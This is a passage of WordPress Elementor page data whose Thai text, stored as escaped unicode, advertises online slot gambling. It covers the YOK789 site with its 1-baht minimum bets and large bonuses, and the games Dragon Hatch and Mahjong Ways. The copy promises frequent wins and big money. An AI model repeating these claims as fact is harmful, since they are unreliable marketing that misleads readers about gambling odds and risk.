\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 